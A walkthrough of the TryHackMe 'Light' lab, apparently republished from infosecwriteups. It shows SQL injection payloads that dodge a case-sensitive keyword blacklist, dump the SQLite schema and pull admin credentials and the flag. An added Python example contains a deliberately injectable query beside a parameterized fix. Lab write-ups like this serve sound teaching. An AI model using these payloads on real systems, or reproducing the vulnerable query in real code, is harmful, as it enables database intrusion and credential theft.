Light TryHackMe Walkthrough
Summary: the article describes an SQL injection attack against a database application called "Light". By using the UNION operator and bypassing the keyword filter, the author extracts the database structure and sensitive information, including usernames and passwords. 2025-10-30 09:5:39 Author: infosecwriteups.com (view original) Reads: 9

The.Flying.Wolf


Payloads

About Room

I am working on a database application called Light! Would you like to try it out?
If so, the application is running on port 1337. You can connect to it using nc <ip> 1337
You can use the username smokey in order to get started.

Room Link

After trying the username smokey, it became clear that the application is vulnerable.

  • After entering smokey it returned a password, so SQL payloads can be injected.
┌─[TheFlyingWolf]─[~]
└──╼ $nc 10.x.x.x 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
  • Sending smokey ' as the username returned an SQL error:
Please enter your username: smokey '
Error: unrecognized token: "'smokey '' LIMIT 30"
  • Next, tried to find the database version and got a different response.
  • The message "Ahh there is a word in there I don't like :(" indicates that the application filters (blacklists) certain words or phrases to block SQL injection attempts.
Please enter your username: smoke ' select sqlite_version()
Ahh there is a word in there I don't like :(
  • The application doesn't detect or block Select (mixed case, with a capital S) but blocks select/SELECT (all lowercase or all uppercase), which means the filtering mechanism is case-sensitive.
Please enter your username: smoke ' Select sqlite_version()
Error: near "Select": syntax error
  • The UNION operator in SQL combines the results of two or more SELECT statements into a single result set; by default the combined result set contains only unique rows.
Please enter your username: smoke ' Union Select sqlite_version()
Error: unrecognized token: "' LIMIT 30"
Please enter your username: smoke ' Union Select sqlite_version()'
Password: 3.31.1
  • Extracting the database structure:
Please enter your username: smoke ' Union sELECT sql FROM sqlite_schema'
Error: no such table: sqlite_schema
Please enter your username: smoke ' Union sELECT sql FROM sqlite_master'
Password: CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
  • Found the table admintable with the columns id, username and password.

First Attempt:

smoke ' Union sELECT username from admintable where username='
  • This query likely resulted in:
SELECT * FROM users WHERE username = 'smoke ' UNION SELECT username FROM admintable WHERE username = '';
  • The subquery from admintable returned no results because no username matched an empty string ('').
  • Output: Username not found.

Second Attempt:

smoke ' Union sELECT username from admintable where username='%'
  • This query likely resulted in:
SELECT * FROM users WHERE username = 'smoke ' UNION SELECT username FROM admintable WHERE username = '%';
  • With the = operator, % is compared as a literal character rather than a wildcard, so no match was found.
  • Output: Username not found.

Third Attempt:

smoke ' Union sELECT username from admintable where username like '
  • This query is incomplete and malformed because the LIKE operator requires a pattern to match (e.g., LIKE 'admin%').
  • Likely resulted in a syntax error internally, but the system reported Username not found.

Fourth Attempt:

smoke ' Union sELECT username from admintable where username like '%'
  • This query likely resulted in:
SELECT * FROM users WHERE username = 'smoke ' UNION SELECT username FROM admintable WHERE username LIKE '%';
  • The % wildcard with LIKE matches any string, so it returned all usernames from the admintable table.
  • The Username: T...........n suggests that the system displayed the first matched result, which was likely T...........n

Input:

somkey' Union Select password from admintable where username='T...........n

Resulting Query: The input likely transformed the backend SQL query into something like:

SELECT * FROM users WHERE username = 'somkey' UNION SELECT password FROM admintable WHERE username = 'T.........n';
  • The first part of the query (SELECT * FROM users ...) would normally fail or return nothing for username = 'somkey'.
  • The UNION clause appends the result of the second query:
SELECT password FROM admintable WHERE username = 'T..........n';
  • The password for T........n was retrieved and displayed: m............7
Please enter your username: somkey' uNION sELECT password from admintable where password LIKE '%
Password: THM{S..........O?}

Why Did This Work?

1. Unsanitized Input:

  • The application directly incorporated your input into the SQL query without escaping or parameterizing it.

2. Successful Injection via UNION:

  • The UNION operator allowed you to append the result of another query (SELECT password FROM admintable) to the original result set.

3. Username Match:

  • The condition WHERE username = 'T.........n' in the injected query ensured only the password for T..........n was returned.
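To make the three points above concrete, here is an added example (not the room's code, and not from the original post) that models the application's string-built query plus a hypothetical case-sensitive blacklist, beside the parameterized version that removes the problem. The admintable schema is the one recovered from sqlite_master above; the users table, the blacklist contents and all row values are constructed assumptions for this example.

```python
import sqlite3

# Constructed in-memory database for this example: admintable copies the CREATE
# statement the walkthrough pulled from sqlite_master; users and all row values
# are made up here and are not the room's real data.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE admintable (id INTEGER PRIMARY KEY, username TEXT, password INTEGER);
        INSERT INTO users (username, password) VALUES ('smokey', 'example-user-pass');
        INSERT INTO admintable (username, password)
            VALUES ('example-admin', 'example-admin-secret');
    """)
    return db

# Hypothetical blacklist modelled on the room's behaviour: exact-case matching,
# so mixed-case keywords such as "Select" or "Union" are not caught.
BLOCKED = ("select", "SELECT", "union", "UNION")

def lookup_vulnerable(db, username):
    """String-built query guarded only by a case-sensitive keyword blacklist."""
    if any(word in username for word in BLOCKED):
        return "Ahh there is a word in there I don't like :("
    # Assumed single-column query (the UNION results in the write-up only line
    # up if the original SELECT returns one column); the trailing LIMIT 30
    # mirrors the one visible in the room's error messages.
    sql = f"SELECT password FROM users WHERE username = '{username}' LIMIT 30"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"Error: {exc}"
    return f"Password: {row[0]}" if row else "Username not found."

def lookup_safe(db, username):
    """Parameterized query: the input is bound as a value and never parsed as
    SQL, so no keyword filtering is needed at all."""
    sql = "SELECT password FROM users WHERE username = ? LIMIT 30"
    row = db.execute(sql, (username,)).fetchone()
    return f"Password: {row[0]}" if row else "Username not found."

if __name__ == "__main__":
    db = build_db()
    probe = "smoke ' Union Select password from admintable where username like '%"
    print("vulnerable:", lookup_vulnerable(db, probe))  # leaks the admin row
    print("safe:      ", lookup_safe(db, probe))        # Username not found.
```

The same input that walks straight through the blacklist is an ordinary string literal to the parameterized query, which is why the fix is binding parameters, not a longer word list.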

Source: https://infosecwriteups.com/light-tryhackme-walkthrough-46440619060b?source=rss----7b722bfd1b8d---4